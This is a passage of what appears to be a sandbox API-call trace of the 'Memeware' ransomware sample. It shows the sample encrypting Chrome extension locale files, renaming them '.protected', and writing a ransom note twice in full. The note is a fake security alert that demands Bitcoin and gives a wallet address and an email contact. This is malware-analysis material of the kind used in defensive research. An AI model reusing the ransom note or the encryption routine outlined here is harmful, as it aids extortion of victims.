(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.753] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.753] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.753] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.753] CloseHandle (hObject=0x164) returned 1 [0080.753] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.753] lstrcmpiW (lpString1="zh_HK", lpString2="Windows") returned 1 [0080.753] lstrcmpiW (lpString1="zh_HK", lpString2="Program Files") returned 1 [0080.753] lstrcmpiW (lpString1="zh_HK", lpString2="Program Files (x86)") returned 1 [0080.753] lstrcmpiW (lpString1="zh_HK", lpString2="$Recycle.bin") returned 1 [0080.753] lstrcmpiW (lpString1="zh_HK", lpString2="System Volume Information") returned 1 [0080.753] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK") returned 144 [0080.753] lstrcmpW (lpString1="zh_HK", lpString2=".") returned 1 [0080.754] lstrcmpW (lpString1="zh_HK", lpString2="..") returned 1 [0080.754] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\*") returned 146 [0080.754] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.754] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.754] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.754] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.754] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.754] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.754] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\.") returned 146 [0080.754] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.754] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.754] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.754] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.754] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.754] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.754] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.754] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\..") returned 147 [0080.754] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.754] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.754] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.754] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.754] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.754] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.754] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.754] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.754] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json") returned 158 [0080.754] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.754] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.754] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.754] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json") returned 158 [0080.755] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json") returned 158 [0080.755] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json") returned 158 [0080.755] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.755] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd2, lpOverlapped=0x0) returned 1 [0080.756] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.756] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd2, lpOverlapped=0x0) returned 1 [0080.756] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.756] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.756] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.756] CloseHandle (hObject=0x168) returned 1 [0080.756] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json.protected") returned 168 [0080.756] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\messages.json.protected")) returned 1 [0080.757] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.757] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.757] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\RESTORE_FILES.txt") returned 162 [0080.757] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_HK\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_hk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.757] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.757] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.758] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.758] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.758] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.758] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.758] CloseHandle (hObject=0x164) returned 1 [0080.758] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.758] lstrcmpiW (lpString1="zh_TW", lpString2="Windows") returned 1 [0080.758] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files") returned 1 [0080.759] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files (x86)") returned 1 [0080.759] lstrcmpiW (lpString1="zh_TW", lpString2="$Recycle.bin") returned 1 [0080.759] lstrcmpiW (lpString1="zh_TW", lpString2="System Volume Information") returned 1 [0080.759] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW") returned 144 [0080.759] lstrcmpW (lpString1="zh_TW", lpString2=".") returned 1 [0080.759] lstrcmpW (lpString1="zh_TW", lpString2="..") returned 1 [0080.759] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\*") returned 146 [0080.759] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.759] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.759] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.760] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.760] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.760] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.760] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\.") returned 146 [0080.760] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.760] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.760] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.760] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.760] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.760] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.760] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.760] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\..") returned 147 [0080.760] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.760] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.760] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.760] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.760] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.760] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.760] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.760] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.760] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json") returned 158 [0080.760] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.760] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.760] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.760] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.760] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.760] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json") returned 158 [0080.760] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.761] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json") returned 158 [0080.761] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.761] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json") returned 158 [0080.761] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.761] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xaa, lpOverlapped=0x0) returned 1 [0080.761] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff56, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.761] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xaa, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xaa, lpOverlapped=0x0) returned 1 [0080.761] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.762] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.762] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.762] CloseHandle (hObject=0x168) returned 1 [0080.762] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json.protected") returned 168 [0080.762] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\messages.json.protected")) returned 1 [0080.762] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.762] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.762] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\RESTORE_FILES.txt") returned 162 [0080.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_TW\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zh_tw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.763] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.763] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.764] lstrlenA 